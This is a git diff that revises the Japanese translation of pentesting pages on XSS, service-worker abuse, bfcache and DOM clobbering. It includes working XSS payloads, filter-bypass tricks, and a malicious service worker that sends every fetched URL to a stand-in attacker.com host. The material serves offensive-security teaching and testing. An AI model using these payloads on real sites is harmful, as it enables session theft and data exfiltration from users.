-**JSコードを実行する属性を持つHTMLタグを作成することが不可能だと思う**場合は、[**ダングリングマークアップ**](../dangling-markup-html-scriptless-injection/)を確認してください。なぜなら、**JS**コードを**実行せずに**脆弱性を**悪用**できるからです。
+**JSコードを実行する属性を持つHTMLタグを作成することが不可能だと思う**なら、[**ダングリングマークアップ**](../dangling-markup-html-scriptless-injection/)を確認してください。なぜなら、**JS**コードを**実行せずに**脆弱性を**悪用**できるからです。
 
-## HTMLタグ内への注入
+## HTMLタグ内へのインジェクション
 
 ### タグ内/属性値からのエスケープ
 
 **HTMLタグ内にいる**場合、最初に試すべきことは、タグから**エスケープ**し、[前のセクション](./#injecting-inside-raw-html)で言及された技術のいくつかを使用してJSコードを実行することです。\
-もし**タグからエスケープできない**場合は、タグ内に新しい属性を作成してJSコードを実行しようとすることができます。例えば、(_この例では属性からエスケープするために二重引用符が使用されていますが、入力がタグ内に直接反映される場合は必要ありません_):
+もし**タグからエスケープできない**場合、タグ内に新しい属性を作成してJSコードを実行しようとすることができます。例えば、(_この例では属性からエスケープするために二重引用符が使用されていますが、入力がタグ内に直接反映される場合は必要ありません_)。
 ```bash
 " autofocus onfocus=alert(document.domain) x="
 " onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
@@ -267,7 +267,7 @@ onerror=alert`1`
 ```
 ### 属性内で
 
-たとえ**属性から逃げることができなくても**（`"`がエンコードされているか削除されている場合）、**どの属性**にあなたの値が反映されているかに応じて、**すべての値を制御しているか、一部だけを制御しているか**によって、それを悪用することができます。**例えば**、`onclick=`のようなイベントを制御している場合、クリックされたときに任意のコードを実行させることができます。\
+たとえ**属性から逃げることができなくても**（`"`がエンコードまたは削除されている場合）、**どの属性**にあなたの値が反映されているかに応じて、**すべての値を制御しているか、一部だけを制御しているか**によって、それを悪用することができます。**例えば**、`onclick=`のようなイベントを制御している場合、クリックされたときに任意のコードを実行させることができます。\
 もう一つの興味深い**例**は、`href`属性で、`javascript:`プロトコルを使用して任意のコードを実行できることです：**`href="javascript:alert(1)"`**
 
 **HTMLエンコーディング/URLエンコードを使用したイベント内のバイパス**
@@ -291,7 +291,7 @@ HTMLタグ属性の値内の**HTMLエンコードされた文字**は**ランタ
 <a href="&#106;avascript:alert(2)">a</a>
 <a href="jav&#x61script:alert(3)">a</a>
 ```
-**URLエンコードも機能します:**
+**URLエンコードも機能することに注意してください:**
 ```python
 <a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
 ```
@@ -325,7 +325,7 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc
 ```
 **これらのプロトコルを注入できる場所**
 
-**一般的に** `javascript:` プロトコルは **`href`** 属性を受け入れる任意のタグで **使用でき**、**ほとんどの** `src` 属性を受け入れるタグで使用できます（ただし `<img>` は除く）
+**一般的に** `javascript:` プロトコルは **`href` 属性を受け入れる任意のタグで使用でき**、**ほとんどの** `src` **属性を受け入れるタグで使用できます（ただし `<img>` は除く）**
 ```markup
 <a href="javascript:alert(1)">
 <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
@@ -347,21 +347,21 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc
 ```
 **他の難読化トリック**
 
-_**この場合、前のセクションのHTMLエンコーディングとUnicodeエンコーディングのトリックも有効です。あなたは属性内にいるからです。**_
+_**この場合、前のセクションのHTMLエンコーディングとUnicodeエンコーディングのトリックも有効です。あなたは属性内にいるためです。**_
 ```javascript
 <a href="javascript:var a='&apos;-alert(1)-&apos;'">
 ```
-さらに、これらのケースには別の**良いトリック**があります：**`javascript:...`内の入力がURLエンコードされていても、実行される前にURLデコードされます。** したがって、**シングルクォート**を使用して**文字列**から**エスケープ**する必要がある場合、**URLエンコードされている**のを見たら、**それは重要ではありません。** 実行時に**シングルクォート**として**解釈されます。**
+さらに、これらのケースには別の**素晴らしいトリック**があります：**`javascript:...`内の入力がURLエンコードされていても、実行される前にURLデコードされます。** したがって、**シングルクォート**を使用して**文字列**から**エスケープ**する必要がある場合、**URLエンコードされている**のを見たら、**それは重要ではありません。** 実行時に**シングルクォート**として**解釈**されます。
 ```javascript
 &apos;-alert(1)-&apos;
 %27-alert(1)-%27
 <iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
 ```
-注意してください、もしあなたが**両方**の`URLencode + HTMLencode`を任意の順序で**ペイロード**をエンコードするために使用しようとすると、それは**機能しません**が、**ペイロードの中で混ぜる**ことができます。
+注意してください、もしあなたが**両方**の`URLencode + HTMLencode`を任意の順序で**ペイロード**をエンコードするために使用しようとすると、それは**機能しません**が、**ペイロード内で混ぜる**ことはできます。
 
 **`javascript:`を使ったHexとOctalエンコード**
 
-あなたは**Hex**と**Octalエンコード**を`iframe`の`src`属性の中で（少なくとも）使用して**JSを実行するHTMLタグを宣言**することができます：
+あなたは**Hex**と**Octalエンコード**を`iframe`の`src`属性内で（少なくとも）使用して**JSを実行するHTMLタグを宣言**することができます：
 ```javascript
 //Encoded: <svg onload=alert(1)>
 // This WORKS
@@ -377,15 +377,15 @@ _**この場合、前のセクションのHTMLエンコーディングとUnicode
 ```javascript
 <a target="_blank" rel="opener"
 ```
-任意の**`<a href=`**タグに**`target="_blank" and rel="opener"`**属性を含むURLを注入できる場合は、この動作を悪用するために**次のページを確認してください**：
+任意の **`<a href=`** タグに **`target="_blank" and rel="opener"`** 属性を含む任意のURLを挿入できる場合は、この動作を悪用するために**次のページを確認してください**：
 
 {{#ref}}
 ../reverse-tab-nabbing.md
 {{#endref}}
 
-### イベントハンドラーのバイパスについて
+### イベントハンドラーのバイパス
 
-まず、このページ（[https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)）を確認して、役立つ**"on"イベントハンドラー**を探してください。\
+まず、このページ ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) で役立つ **"on" イベントハンドラー** を確認してください。\
 このイベントハンドラーの作成を妨げるブラックリストがある場合は、次のバイパスを試すことができます：
 ```javascript
 <svg onload%09=alert(1)> //No safari
@@ -448,7 +448,7 @@ onbeforetoggle="alert(2)" />
 
 ### CSSガジェット
 
-もし、**非常に小さな部分**のウェブでXSSを見つけた場合、何らかのインタラクションが必要です（例えば、マウスオーバー要素を持つフッターの小さなリンクなど）、その要素が占める**スペースを変更して**、リンクが発火する確率を最大化することを試みることができます。
+もし、**非常に小さな部分**のウェブでXSSを見つけた場合、何らかのインタラクションが必要な場合（フッターの小さなリンクにonmouseover要素があるかもしれません）、その要素が占める**スペースを変更して**リンクが発火する確率を最大化することを試みることができます。
 
 例えば、要素に次のようなスタイルを追加することができます：`position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
 
@@ -466,7 +466,7 @@ onbeforetoggle="alert(2)" />
 
 このトリックは[https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)から取られました。
 
-## JavaScriptコード内への注入
+## JavaScriptコード内へのインジェクション
 
 この場合、あなたの**入力**は`.js`ファイルのJSコード内に**反映される**か、`<script>...</script>`タグの間、またはJSコードを実行できるHTMLイベントの間、または`javascript:`プロトコルを受け入れる属性の間にあります。
 
@@ -480,7 +480,7 @@ onbeforetoggle="alert(2)" />
 
 ### JSコード内
 
-`<>`がサニタイズされている場合でも、**文字列をエスケープ**し、**任意のJSを実行**することができます。JSの構文を**修正する**ことが重要です。エラーがあると、JSコードは実行されません。
+`<>`がサニタイズされている場合でも、**入力が**ある場所で**文字列をエスケープ**し、**任意のJSを実行**することができます。JSの構文を**修正する**ことが重要です。エラーがあると、JSコードは実行されません。
 ```
 '-alert(document.domain)-'
 ';alert(document.domain)//
@@ -489,7 +489,7 @@ onbeforetoggle="alert(2)" />
 ### テンプレートリテラル \`\`
 
 **文字列**を構築するために、シングルクォートやダブルクォートの他に、JSは**バックティック** **` `` `**も受け入れます。これはテンプレートリテラルと呼ばれ、`${ ... }`構文を使用して**JS式を埋め込む**ことができます。\
-したがって、バックティックを使用しているJS文字列の中に入力が**反映**されていることがわかった場合、構文`${ ... }`を悪用して**任意のJSコード**を実行することができます：
+したがって、入力がバックティックを使用しているJS文字列内で**反映**されていることがわかった場合、`${ ... }`構文を悪用して**任意のJSコード**を実行できます：
 
 これは次のように**悪用**できます：
 ```javascript
@@ -574,7 +574,7 @@ alert("//\u2028alert(1)") //0xe2 0x80 0xa8
 String.fromCharCode(8233)
 alert("//\u2029alert(1)") //0xe2 0x80 0xa9
 ```
-**JavaScriptのホワイトスペース**
+**JavaScriptの空白**
 ```javascript
 log=[];
 function funct(){}
@@ -746,13 +746,13 @@ dom-xss.md
 {{#endref}}
 
 そこでは、**DOMの脆弱性とは何か、どのように引き起こされるのか、そしてどのように悪用されるのかについての詳細な説明があります**。\
-また、**前述の投稿の最後に** [**DOM Clobbering攻撃についての説明**](dom-xss.md#dom-clobbering)があることを忘れないでください。
+また、**前述の投稿の最後に** [**DOM Clobbering攻撃**](dom-xss.md#dom-clobbering)に関する説明があることを忘れないでください。
 
 ### Self-XSSのアップグレード
 
 ### Cookie XSS
 
-もし、ペイロードをクッキー内に送信することでXSSをトリガーできる場合、これは通常self-XSSです。しかし、**XSSに対して脆弱なサブドメイン**を見つけた場合、このXSSを悪用して全ドメインにクッキーを注入し、メインドメインまたは他のサブドメイン（クッキーXSSに対して脆弱なもの）でクッキーXSSをトリガーすることができます。このために、クッキー投げ攻撃を使用できます：
+もしペイロードをクッキー内に送信することでXSSをトリガーできる場合、これは通常self-XSSです。しかし、もし**XSSに対して脆弱なサブドメイン**を見つけた場合、このXSSを悪用して全ドメインにクッキーを注入し、メインドメインまたは他のサブドメイン（クッキーXSSに対して脆弱なもの）でクッキーXSSをトリガーすることができます。これにはクッキー投げ攻撃を使用できます：
 
 {{#ref}}
 ../hacking-with-cookies/cookie-tossing.md
@@ -762,11 +762,11 @@ dom-xss.md
 
 ### 管理者にセッションを送信する
 
-ユーザーが自分のプロフィールを管理者と共有できる場合、もしself XSSがユーザーのプロフィール内にあり、管理者がそれにアクセスすると、脆弱性がトリガーされます。
+ユーザーが管理者とプロフィールを共有できる場合、もしself XSSがユーザーのプロフィール内にあり、管理者がそれにアクセスすると、脆弱性がトリガーされます。
 
 ### セッションミラーリング
 
-self XSSを見つけ、ウェブページに**管理者用のセッションミラーリング**がある場合、例えばクライアントが助けを求めることを許可し、管理者があなたを助けるために、彼は自分のセッションからあなたのセッションで見ているものを見ます。
+self XSSを見つけ、ウェブページに**管理者用のセッションミラーリング**がある場合、例えばクライアントが助けを求めることを許可し、管理者があなたを助けるためにあなたのセッションで見ているものを彼のセッションから見ることになります。
 
 あなたは**管理者にself XSSをトリガーさせて、彼のクッキー/セッションを盗む**ことができます。
 
@@ -787,7 +787,7 @@ self XSSを見つけ、ウェブページに**管理者用のセッションミ
 ```
 contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
 ```
-ペア「Key」「Value」は次のようにエコーされます:
+ペア "Key","Value" は次のようにエコーされます:
 ```
 {" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}
 ```
@@ -825,18 +825,18 @@ document['default'+'View'][`\u0061lert`](3)
 ```
 ### XSS with header injection in a 302 response
 
-もし**302リダイレクトレスポンスにヘッダーを注入できる**ことがわかった場合、**ブラウザに任意のJavaScriptを実行させる**ことを試みることができます。これは**簡単ではありません**。なぜなら、現代のブラウザはHTTPレスポンスステータスコードが302の場合、HTTPレスポンスボディを解釈しないため、単なるクロスサイトスクリプティングペイロードは無意味だからです。
+もし**302リダイレクトレスポンスにヘッダーを注入できる**ことがわかったら、**ブラウザに任意のJavaScriptを実行させる**ことを試みることができます。これは**簡単ではありません**。なぜなら、現代のブラウザはHTTPレスポンスステータスコードが302の場合、HTTPレスポンスボディを解釈しないため、単なるクロスサイトスクリプティングペイロードは無意味だからです。
 
-[**このレポート**](https://www.gremwell.com/firefox-xss-302)と[**こちら**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)では、Locationヘッダー内でいくつかのプロトコルをテストし、それらのいずれかがブラウザにボディ内のXSSペイロードを検査して実行させることを許可するかどうかを確認する方法を読むことができます。\
+[**このレポート**](https://www.gremwell.com/firefox-xss-302)や[**こちら**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)では、Locationヘッダー内でいくつかのプロトコルをテストし、それらのいずれかがブラウザにボディ内のXSSペイロードを検査して実行させることを許可するかどうかを確認する方法を読むことができます。\
 過去に知られているプロトコル: `mailto://`, `//x:1/`, `ws://`, `wss://`, _空のLocationヘッダー_, `resource://`。
 
 ### Only Letters, Numbers and Dots
 
-もし、JavaScriptが**実行する**ための**コールバック**をこれらの文字に制限して指定できる場合。[**この投稿のこのセクションを読んで**](./#javascript-function)この動作を悪用する方法を見つけてください。
+もし**コールバック**を示すことができるなら、javascriptが**実行する**のはこれらの文字に制限されます。[**この投稿のこのセクションを読む**](./#javascript-function)ことで、この動作を悪用する方法を見つけることができます。
 
 ### Valid `<script>` Content-Types to XSS
 
-（[**こちらから**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)）もし`application/octet-stream`のような**コンテンツタイプ**でスクリプトを読み込もうとすると、Chromeは次のエラーを表示します：
+（[**こちら**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)から）もし`application/octet-stream`のような**コンテンツタイプ**でスクリプトを読み込もうとすると、Chromeは次のエラーを投げます：
 
 > MIMEタイプ（‘application/octet-stream’）が実行可能ではなく、厳格なMIMEタイプチェックが有効になっているため、‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx')からスクリプトの実行を拒否しました。
 
@@ -1381,7 +1381,7 @@ body:username.value+':'+this.value
 
 ### キーロガー
 
-GitHubでいくつかの異なるものを見つけました：
+GitHubで検索したところ、いくつかの異なるものが見つかりました：
 
 - [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
 - [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
@@ -1469,9 +1469,9 @@ You can also use: [https://xsshunter.com/](https://xsshunter.com)
 <!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
 <div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
 ```
-### Regex - 隠れたコンテンツへのアクセス
+### Regex - 隠されたコンテンツへのアクセス
 
-[**このレポート**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay)から、いくつかの値がJSから消えても、異なるオブジェクトのJS属性内でそれらを見つけることが可能であることがわかります。例えば、REGEXの入力は、REGEXの入力値が削除された後でも見つけることができます：
+From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) では、いくつかの値がJSから消えても、異なるオブジェクトのJS属性内でそれらを見つけることが可能であることがわかります。たとえば、REGEXの入力は、正規表現の入力値が削除された後でも見つけることができます：
 ```javascript
 // Do regex with flag
 flag = "CTF{FLAG}"
diff --git a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
index dd8a530ae..5cc1d4c93 100644
--- a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
+++ b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
@@ -4,22 +4,22 @@
 
 ## 基本情報
 
-**サービスワーカー**は、ブラウザによってバックグラウンドで実行されるスクリプトで、ウェブページとは別に動作し、ウェブページやユーザーの操作を必要としない機能を有効にし、**オフラインおよびバックグラウンド処理**の能力を向上させます。サービスワーカーに関する詳細情報は[こちら](https://developers.google.com/web/fundamentals/primers/service-workers)で確認できます。脆弱なウェブドメイン内でサービスワーカーを悪用することで、攻撃者はそのドメイン内のすべてのページに対する被害者の操作を制御することができます。
+**サービスワーカー**は、ブラウザによってバックグラウンドで実行されるスクリプトで、ウェブページとは別に動作し、ウェブページやユーザーの操作を必要としない機能を可能にし、**オフラインおよびバックグラウンド処理**の能力を向上させます。サービスワーカーに関する詳細情報は[こちら](https://developers.google.com/web/fundamentals/primers/service-workers)で確認できます。脆弱なウェブドメイン内でサービスワーカーを悪用することで、攻撃者はそのドメイン内のすべてのページに対する被害者の操作を制御することができます。
 
 ### 既存のサービスワーカーの確認
 
-既存のサービスワーカーは、**Developer Tools**の**Application**タブの**Service Workers**セクションで確認できます。別の方法として、[chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals)にアクセスすることで、より詳細なビューを得ることができます。
+既存のサービスワーカーは、**Developer Tools**の**Application**タブの**Service Workers**セクションで確認できます。別の方法として、[chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals)を訪れることで、より詳細なビューを得ることができます。
 
 ### プッシュ通知
 
-**プッシュ通知の権限**は、**サービスワーカー**がユーザーの直接的な操作なしにサーバーと通信する能力に直接影響します。権限が拒否されると、サービスワーカーが継続的な脅威をもたらす可能性が制限されます。逆に、権限を付与すると、潜在的なエクスプロイトの受信と実行を可能にすることでセキュリティリスクが増加します。
+**プッシュ通知の権限**は、**サービスワーカー**が直接ユーザーの操作なしにサーバーと通信する能力に直接影響します。権限が拒否されると、サービスワーカーが継続的な脅威をもたらす可能性が制限されます。逆に、権限を付与すると、潜在的なエクスプロイトの受信と実行を可能にすることでセキュリティリスクが増加します。
 
 ## サービスワーカーを作成する攻撃
 
 この脆弱性を悪用するためには、次のものを見つける必要があります：
 
 - サーバーに**任意のJS**ファイルを**アップロード**する方法と、アップロードしたJSファイルの**サービスワーカーを読み込むためのXSS**
-- **出力を操作できる**（任意のJSコードを使用）**脆弱なJSONPリクエスト**と、**ペイロードを持つJSONPを読み込むためのXSS**が必要です。このペイロードは**悪意のあるサービスワーカーを読み込む**ものです。
+- **出力を操作できる**脆弱なJSONPリクエスト（**任意のJSコード**を使用）と、**ペイロードを持つJSONPを読み込むためのXSS**が必要です。このペイロードは**悪意のあるサービスワーカーを読み込む**ものです。
 
 次の例では、`fetch`イベントをリッスンし、**取得した各URLを攻撃者のサーバーに送信する**新しいサービスワーカーを**登録するためのコード**を示します（これは**サーバー**に**アップロード**するか、**脆弱なJSONP**レスポンスを介して読み込む必要があるコードです）：
 ```javascript
@@ -51,13 +51,13 @@ xhttp2.send();
 var sw =
 "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//"
 ```
-専用の**C2**があり、**Service Workersの悪用**に特化した[**Shadow Workers**](https://shadow-workers.github.io)は、これらの脆弱性を悪用するのに非常に役立ちます。
+C2に特化した**Service Workersの悪用**のための**Shadow Workers**があり、これらの脆弱性を悪用するのに非常に役立ちます。
 
-**24時間キャッシュディレクティブ**は、悪意のあるまたは侵害された**service worker (SW)**の寿命を、XSS脆弱性の修正後最大24時間に制限します。オンラインクライアントの状態を前提としています。脆弱性を最小限に抑えるために、サイト運営者はSWスクリプトのTTL（Time-To-Live）を短くすることができます。開発者は、迅速な無効化のために[**service worker kill-switch**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776)を作成することも推奨されています。
+**24時間キャッシュディレクティブ**は、悪意のあるまたは侵害された**サービスワーカー（SW）**の寿命を、XSS脆弱性の修正後最大24時間に制限します。オンラインクライアントの状態を前提としています。脆弱性を最小限に抑えるために、サイト運営者はSWスクリプトのTTL（Time-To-Live）を短くすることができます。開発者は、迅速な無効化のために[**サービスワーカーキルスイッチ**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776)を作成することも推奨されています。
 
-## DOM Clobberingを介したSW内の`importScripts`の悪用
+## DOM Clobberingを介したSWでの`importScripts`の悪用
 
-Service Workerから呼び出される**`importScripts`**関数は、**異なるドメインからスクリプトをインポート**することができます。この関数が**攻撃者が**変更できる**パラメータを使用して呼び出されると、攻撃者は**自分のドメインからJSスクリプトをインポート**し、XSSを取得することができます。
+サービスワーカーから呼び出される**`importScripts`**関数は、**異なるドメインからスクリプトをインポート**することができます。この関数が**攻撃者が**変更できる**パラメータを使用して呼び出されると、攻撃者は**自分のドメインからJSスクリプトをインポート**し、XSSを取得することができます。
 
 **これはCSP保護を回避します。**
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
index 26e9b7e15..bd0db2da7 100644
--- a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
@@ -4,7 +4,7 @@
 
 詳細は[**このレポートで**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-spanote)確認できます。
 
-ここで議論されている技術は、**バック/フォワードキャッシュ (bfcache)** と **ディスクキャッシュ** の2つの主要なキャッシュタイプの動作と相互作用を理解することに関係しています。bfcacheは、JavaScriptヒープを含むページの完全なスナップショットを保存し、より包括的なスナップショットを保存できるため、バック/フォワードナビゲーションの際にディスクキャッシュよりも優先されます。一方、ディスクキャッシュは、JavaScriptヒープを含まずにウェブから取得したリソースを保存し、通信コストを削減するためにバック/フォワードナビゲーションに利用されます。ディスクキャッシュの興味深い点は、`fetch`を使用して取得したリソースが含まれていることであり、つまりアクセスされたURLリソースはキャッシュからブラウザによってレンダリングされます。
+ここで議論されている技術は、**バック/フォワードキャッシュ (bfcache)** と **ディスクキャッシュ** の2つの主要なキャッシュタイプの動作と相互作用を理解することに関係しています。bfcacheは、JavaScriptヒープを含むページの完全なスナップショットを保存し、より包括的なスナップショットを保存できるため、バック/フォワードナビゲーションにおいてディスクキャッシュよりも優先されます。一方、ディスクキャッシュは、JavaScriptヒープを含まずにウェブから取得したリソースを保存し、通信コストを削減するためにバック/フォワードナビゲーションに利用されます。ディスクキャッシュの興味深い点は、`fetch`を使用して取得したリソースが含まれていることであり、つまりアクセスされたURLリソースはキャッシュからブラウザによってレンダリングされます。
 
 ### 主なポイント:
 
@@ -24,6 +24,6 @@
 
 ディスクキャッシュが利用されたことの確認は、Google ChromeのDevToolsを使用して行うことができます。
 
-bfcacheとディスクキャッシュに関する詳細は、[web.devのbfcache](https://web.dev/i18n/en/bfcache/)および[Chromiumのディスクキャッシュに関する設計文書](https://www.chromium.org/developers/design-documents/network-stack/disk-cache/)で確認できます。
+bfcacheとディスクキャッシュに関するさらなる詳細は、[web.devのbfcache](https://web.dev/i18n/en/bfcache/)および[Chromiumのディスクキャッシュに関する設計文書](https://www.chromium.org/developers/design-documents/network-stack/disk-cache/)で確認できます。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
index 4ee225c78..c1a72f754 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
@@ -11,7 +11,7 @@ HTMLタグの**`id`**および**`name`**属性を使用して、**JSコンテキ
 console.log(typeof document.x) //[object HTMLFormElement]
 </script>
 ```
-**特定の**要素のみが**name属性**を使用してグローバルをクラッシャーできます。それらは:`embed`、`form`、`iframe`、`image`、`img`、および`object`です。
+**特定の**要素のみが**name属性**を使用してグローバルをクラッシャーできます。それらは、`embed`、`form`、`iframe`、`image`、`img`、および`object`です。
 
 興味深いことに、**form要素**を使用して変数を**クラッシャー**すると、要素自体の**`toString`**値が得られます: `[object HTMLFormElement]`ですが、**anchor**の場合、**`toString`**はアンカーの**`href`**になります。したがって、**`a`**タグを使用してクラッシャーすると、**文字列として扱われる**ときに**値**を**制御**できます:
 ```html
@@ -41,7 +41,7 @@ console.log(x.y) //controlled
 alert(x.y.z.value) //controlled
 </script>
 ```
-属性をさらに上書きすることは**より複雑ですが、依然として可能です**。iframeを使用して:
+属性をさらに上書きすることは**より複雑ですが、それでも可能です**、iframeを使用して:
 ```html
 <iframe name="x" srcdoc="<a id=y href=controlled></a>"></iframe>
 <style>
@@ -52,9 +52,9 @@ alert(x.y) //controlled
 </script>
 ```
 > [!WARNING]
-> styleタグは**iframeがレンダリングするのに十分な時間を与えるため**に使用されます。これがないと、**undefined**のアラートが表示されます。
+> style タグは **iframe がレンダリングされるのに十分な時間を与えるため** に使用されます。これがないと、**undefined** のアラートが表示されます。
 
-より深い属性をクラッシャーするには、**htmlエンコーディングを使用したiframes**を次のように使用できます:
+より深い属性をクラッシャーするには、**html エンコーディングを使用した iframe** を次のように使用できます:
 ```html
 <iframe
 name="a"
@@ -68,7 +68,7 @@ alert(a.b.c.d.e) //controlled
 ```
 ### **フィルターバイパス**
 
-フィルターが `document.getElementByID('x').attributes` のようなものでノードの **プロパティ** を **ループ** している場合、属性 **`.attributes`** を **クラッシャー** してフィルターを **壊す** ことができます。その他のDOMプロパティ、例えば **`tagName`** 、 **`nodeName`** や **`parentNode`** なども **クラッシャブル** です。
+フィルターが `document.getElementByID('x').attributes` のようなものでノードの **プロパティ** を **ループ** している場合、属性 **`.attributes`** を **クラッシャブル** にしてフィルターを **壊す** ことができます。他のDOMプロパティ、例えば **`tagName`** 、 **`nodeName`** や **`parentNode`** なども **クラッシャブル** です。
 ```html
 <form id="x"></form>
 <form id="y">
@@ -81,11 +81,11 @@ console.log(document.getElementById("y").nodeName) //[object HTMLInputElement]
 ```
 ## **`window.someObject`のクラッキング**
 
-JavaScriptでは、次のようなものを見つけることが一般的です:
+JavaScriptでは、次のようなものを見つけることが一般的です：
 ```javascript
 var someObject = window.someObject || {}
 ```
-ページ上のHTMLを操作することで、`someObject`をDOMノードで上書きすることができ、セキュリティの脆弱性を引き起こす可能性があります。例えば、`someObject`を悪意のあるスクリプトを指すアンカー要素に置き換えることができます：
+ページ上のHTMLを操作することで、`someObject`をDOMノードで上書きすることができ、セキュリティの脆弱性を引き起こす可能性があります。たとえば、`someObject`を悪意のあるスクリプトを指すアンカー要素に置き換えることができます：
 ```html
 <a id=someObject href=//malicious-website.com/malicious.js></a>
 ```
@@ -112,15 +112,15 @@ document.body.appendChild(script)
 
 ドキュメントによると、DOMクラッキングを使用してドキュメントオブジェクトの属性を上書きすることが可能です：
 
-> [Document](https://html.spec.whatwg.org/multipage/dom.html#document) インターフェースは [named properties](https://webidl.spec.whatwg.org/#dfn-support-named-properties) をサポートしています。[supported property names](https://webidl.spec.whatwg.org/#dfn-supported-property-names) は、[Document](https://html.spec.whatwg.org/multipage/dom.html#document) オブジェクトのドキュメントが任意の時点で持つもので、[tree order](https://dom.spec.whatwg.org/#concept-tree-order) に従い、後の重複を無視し、同じ要素が両方を提供する場合は、[id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 属性からの値が名前属性からの値の前に来ます：
+> [Document](https://html.spec.whatwg.org/multipage/dom.html#document) インターフェースは [named properties](https://webidl.spec.whatwg.org/#dfn-support-named-properties) をサポートしています。[Document](https://html.spec.whatwg.org/multipage/dom.html#document) オブジェクトの [supported property names](https://webidl.spec.whatwg.org/#dfn-supported-property-names) は、次のもので構成されます。[tree order](https://dom.spec.whatwg.org/#concept-tree-order) に従い、後の重複を無視し、同じ要素が両方を提供する場合、[id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 属性からの値が名前属性からの値の前に来ます：
 >
-> \- 非空の名前コンテンツ属性を持ち、ドキュメントを[ルート](https://dom.spec.whatwg.org/#concept-tree-root)とする[ドキュメントツリー](https://dom.spec.whatwg.org/#in-a-document-tree)内にあるすべての[exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element)、[form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element)、[iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element)、[img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element)、および[exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element)要素の名前コンテンツ属性の値；
+> \- 空でない名前コンテンツ属性を持ち、ドキュメントを [root](https://dom.spec.whatwg.org/#concept-tree-root) とする [document tree](https://dom.spec.whatwg.org/#in-a-document-tree) にあるすべての [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element)、[form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element)、[iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element)、[img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element)、および [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) 要素の名前コンテンツ属性の値；
 > \
